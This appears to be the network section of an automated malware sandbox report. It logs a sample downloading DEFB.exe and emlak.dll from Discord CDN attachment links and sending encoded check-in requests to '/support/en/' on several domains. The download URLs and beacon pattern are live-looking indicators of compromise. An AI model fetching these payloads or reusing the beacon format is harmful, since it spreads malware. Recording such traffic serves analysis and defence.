Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
www.alliancefb.com | 3.223.115.185 | |
www.littlehousenursery.com | 3.130.158.209 | |
www.intlgcap.com |
CNAME
intlgcap.com
|
34.102.136.180 |
www.cutass.com | 52.128.23.153 | |
cdn.discordapp.com | 162.159.133.233 |
- TCP Requests
- UDP Requests
-
-
192.168.56.101:54056 164.124.101.2:53
-
192.168.56.101:55450 164.124.101.2:53
-
192.168.56.101:59369 164.124.101.2:53
-
192.168.56.101:61479 164.124.101.2:53
-
192.168.56.101:62324 164.124.101.2:53
-
192.168.56.101:65329 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:49152 239.255.255.250:3702
-
192.168.56.101:61480 239.255.255.250:3702
-
192.168.56.101:62445 239.255.255.250:1900
-
192.168.56.101:62447 239.255.255.250:3702
-
192.168.56.101:62449 239.255.255.250:3702
-
52.231.114.183:123 192.168.56.101:123
-
GET
200
https://cdn.discordapp.com/attachments/869310376943181867/869390552234356837/DEFB.exe
REQUEST
RESPONSE
BODY
GET /attachments/869310376943181867/869390552234356837/DEFB.exe HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 04 Aug 2021 01:40:22 GMT
Content-Type: application/x-msdos-program
Content-Length: 186880
Connection: keep-alive
CF-Ray: 679413cb7bb2a26d-ICN
Accept-Ranges: bytes
Age: 76634
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=DEFB.exe
ETag: "c0f7a78a4830a681b94806cafc4275ec"
Expires: Thu, 04 Aug 2022 01:40:22 GMT
Last-Modified: Tue, 27 Jul 2021 01:27:40 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1627349260197455
x-goog-hash: crc32c=RNNlZQ==
x-goog-hash: md5=wPenikgwpoG5SAbK/EJ17A==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 186880
X-GUploader-UploadID: ADPycduSIozw1t9dZ6i6dzTEYkuV57yBV2ID0olHE3UiC5k77AtLwydAGBX7gqlMAdYRBVoeqK2x2v4-MBEIimpQ8kg
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5ZdeT7r7r3cCauWtwZ0kW0vPz1Hm9ckpDPDt4JPvg9zC%2FXqHHUDyaxQ%2FC6oSIDm9DKfkSEImSJRaRT9vvZnUL23jJrMdTlI%2FEYrsfvZGIGGGb4rauQ2jWGR2A9cm1yJT09e9Hg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
200
https://cdn.discordapp.com/attachments/867927972013809777/871568246497755246/emlak.dll
REQUEST
RESPONSE
BODY
GET /attachments/867927972013809777/871568246497755246/emlak.dll HTTP/1.1
Host: cdn.discordapp.com
HTTP/1.1 200 OK
Date: Wed, 04 Aug 2021 01:40:23 GMT
Content-Type: application/x-msdos-program
Content-Length: 63488
Connection: keep-alive
CF-Ray: 679413cc0be1a26d-ICN
Accept-Ranges: bytes
Age: 116412
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=emlak.dll
ETag: "116ea5563c66463a934087a368871189"
Expires: Thu, 04 Aug 2022 01:40:23 GMT
Last-Modified: Mon, 02 Aug 2021 01:41:02 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1627868462968418
x-goog-hash: crc32c=b9Rwzw==
x-goog-hash: md5=EW6lVjxmRjqTQIejaIcRiQ==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 63488
X-GUploader-UploadID: ADPycdt5memi1y9wsyFtc924bTszv8UOsTjg3OgUFMUkZIO_FN6JsFjR1uGo4Qvt-jBW7AQsTbwi_MU814VHP9wd3ak
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=T6QAxSiO5J5jnpR%2Fo3nooxx4EK3gC2Yu50FLbAvAwtWIfGo8qTJnXecbAVGR8zXQxqsQgeOOpCExCIDc5ge3145lVJV4B51kuFQhIzUHB68IJHq%2FJJ26tJfmwUe9iMwqbZpFKg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
463
http://www.cutass.com/support/en/?5j=Dj996a3h2qboTLKZjRVTU3yTCokC5la5/bDYIKZf1f+40ghf16aux1W+Ojmg1zuK+8dAGGea&vTdDF=LJBx
REQUEST
RESPONSE
BODY
GET /support/en/?5j=Dj996a3h2qboTLKZjRVTU3yTCokC5la5/bDYIKZf1f+40ghf16aux1W+Ojmg1zuK+8dAGGea&vTdDF=LJBx HTTP/1.1
Host: www.cutass.com
Connection: close
HTTP/1.1 463
Server: nginx
Date: Wed, 04 Aug 2021 01:40:55 GMT
Content-Type: text/html
Content-Length: 8915
Connection: close
ETag: "5e52ceb0-22d3"
X-DIS-Request-ID: fa84875e27027e9068e75f9d041baa8a
Set-Cookie: dis-remote-addr=175.208.134.150
Set-Cookie: dis-timestamp=2021-08-03T18:40:55-07:00
Set-Cookie: dis-request-id=fa84875e27027e9068e75f9d041baa8a
X-Frame-Options: sameorigin
GET
403
http://www.intlgcap.com/support/en/?5j=yUPGOazhmvJ2CH9iveJV3c6q5n8a839rRUuOKhB1ehBnAJmTBA/qAAmyLVpSMz8YXnAKD7NQ&vTdDF=LJBx
REQUEST
RESPONSE
BODY
GET /support/en/?5j=yUPGOazhmvJ2CH9iveJV3c6q5n8a839rRUuOKhB1ehBnAJmTBA/qAAmyLVpSMz8YXnAKD7NQ&vTdDF=LJBx HTTP/1.1
Host: www.intlgcap.com
Connection: close
HTTP/1.1 403 Forbidden
Server: openresty
Date: Wed, 04 Aug 2021 01:41:15 GMT
Content-Type: text/html
Content-Length: 275
ETag: "610650f1-113"
Via: 1.1 google
Connection: close
GET
302
http://www.alliancefb.com/support/en/?5j=E9P+t5aMWSD3TCjLS7wsY7NUIYxz2U33Ldo09wpuEhFP28xbW8bmWX4A0/kALO2yod300/s/&vTdDF=LJBx
REQUEST
RESPONSE
BODY
GET /support/en/?5j=E9P+t5aMWSD3TCjLS7wsY7NUIYxz2U33Ldo09wpuEhFP28xbW8bmWX4A0/kALO2yod300/s/&vTdDF=LJBx HTTP/1.1
Host: www.alliancefb.com
Connection: close
HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://www.hugedomains.com/domain_profile.cfm?d=alliancefb&e=com
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Wed, 04 Aug 2021 01:41:27 GMT
Connection: close
Content-Length: 186
GET
404
http://www.littlehousenursery.com/support/en/?5j=+fkBQExBug/W6CRY/WlLuwYAm4n6F3ntZ2n1qN5ZglaqvIkQHxZi1AhS8ZV4317vdVVeyrPl&vTdDF=LJBx
REQUEST
RESPONSE
BODY
GET /support/en/?5j=+fkBQExBug/W6CRY/WlLuwYAm4n6F3ntZ2n1qN5ZglaqvIkQHxZi1AhS8ZV4317vdVVeyrPl&vTdDF=LJBx HTTP/1.1
Host: www.littlehousenursery.com
Connection: close
HTTP/1.1 404 Not Found
Date: Wed, 04 Aug 2021 01:42:17 GMT
Content-Type: text/html
Content-Length: 153
Connection: close
Server: nginx/1.16.1
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.2 192.168.56.101:49200 162.159.133.233:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 54:e1:a7:9d:cc:c8:60:86:f1:a5:da:74:0e:5a:ab:45:df:37:8a:78 |
Snort Alerts
No Snort Alerts